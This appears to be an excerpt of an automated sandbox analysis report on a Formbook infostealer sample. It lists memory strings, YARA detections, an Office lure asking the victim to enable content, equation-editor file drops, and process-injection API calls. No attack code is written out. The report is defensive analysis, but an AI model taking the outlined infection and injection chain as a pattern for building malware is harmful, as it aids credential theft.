            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000006.00000000.2197440508.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
            Source: explorer.exe, 00000006.00000000.2197307485.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
            Source: explorer.exe, 00000006.00000000.2205387909.000000000861C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2197440508.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
            Source: Screenshot number: 4Screenshot OCR: document is protected " t9 19 20 21 22 23 Open the document in If this document was 24 Mkroso
            Office equation editor drops PE fileShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
            Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
            Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 76E20000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 76D20000 page execute and read and write
            Source: C:\Windows\SysWOW64\raserver.exeMemory allocated: 76E20000 page execute and read and write
            Source: C:\Windows\SysWOW64\raserver.exeMemory allocated: 76D20000 page execute and read and write
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A015C NtQueryInformationProcess,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A014F NtQueryInformationProcess,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A0B59 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00419D50 NtCreateFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00419E00 NtReadFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00419E80 NtClose,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00419F30 NtAllocateVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00419D4B NtCreateFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00419DFE NtReadFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00419DA4 NtCreateFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00419E7A NtClose,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00419F2B NtAllocateVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009100C4 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00910048 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00910078 NtResumeThread,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090F9F0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090F900 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FAE8 NtQueryInformationProcess,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FBB8 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FB68 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FC90 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FC60 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FD8C NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FDC0 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FEA0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FFB4 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009110D0 NtOpenProcessToken,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00910060 NtQuerySection,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009101D4 NtSetValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0091010C NtOpenDirectoryObject,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00911148 NtOpenThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009107AC NtCreateMutant,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090F8CC NtWaitForSingleObject,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00911930 NtSetContextThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090F938 NtWriteFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FAB8 NtQueryValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FA20 NtQueryInformationFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FA50 NtEnumerateValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FBE8 NtQueryVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FB50 NtCreateKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FC30 NtOpenProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00910C40 NtGetContextThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FC48 NtSetInformationFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00911D80 NtSuspendThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FD5C NtEnumerateKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FE24 NtWriteVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FFFC NtCreateProcessEx,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FF34 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F700C4 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F707AC NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6F9F0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6F900 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FBB8 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FB68 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FB50 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FAE8 NtQueryInformationProcess,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FAB8 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FDC0 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FD8C NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FC60 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FFB4 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F701D4 NtSetValueKey,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F71148 NtOpenThread,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7010C NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F710D0 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F70078 NtResumeThread,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F70060 NtQuerySection,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F70048 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F71930 NtSetContextThread,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6F938 NtWriteFile,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6F8CC NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FBE8 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FA50 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FA20 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F71D80 NtSuspendThread,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FD5C NtEnumerateKey,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FC90 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F70C40 NtGetContextThread,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FC48 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FC30 NtOpenProcess,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FFFC NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FF34 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FEA0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FE24 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00139D50 NtCreateFile,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00139E00 NtReadFile,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00139E80 NtClose,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00139F30 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00139D4B NtCreateFile,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00139DA4 NtCreateFile,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00139DFE NtReadFile,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00139E7A NtClose,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00139F2B NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E693CE NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E69862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E693D2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E69DAE NtResumeThread,
            Source: C:\Windows\SysWOW64\cmd.exeFile deleted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A38B8
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A0910
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003AA380
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A0471
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A1CB0
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A2488
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A2D58
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A0DA0
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A10DB
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A0901
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A43C0
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A247A
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003ACC40
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A2D48
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A0D91
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003AA728
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00891850
            Source: C:\Users\Public\vbc.exeCode function: 4_2_04430046
            Source: C:\Users\Public\vbc.exeCode function: 4_2_04430048
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00401030
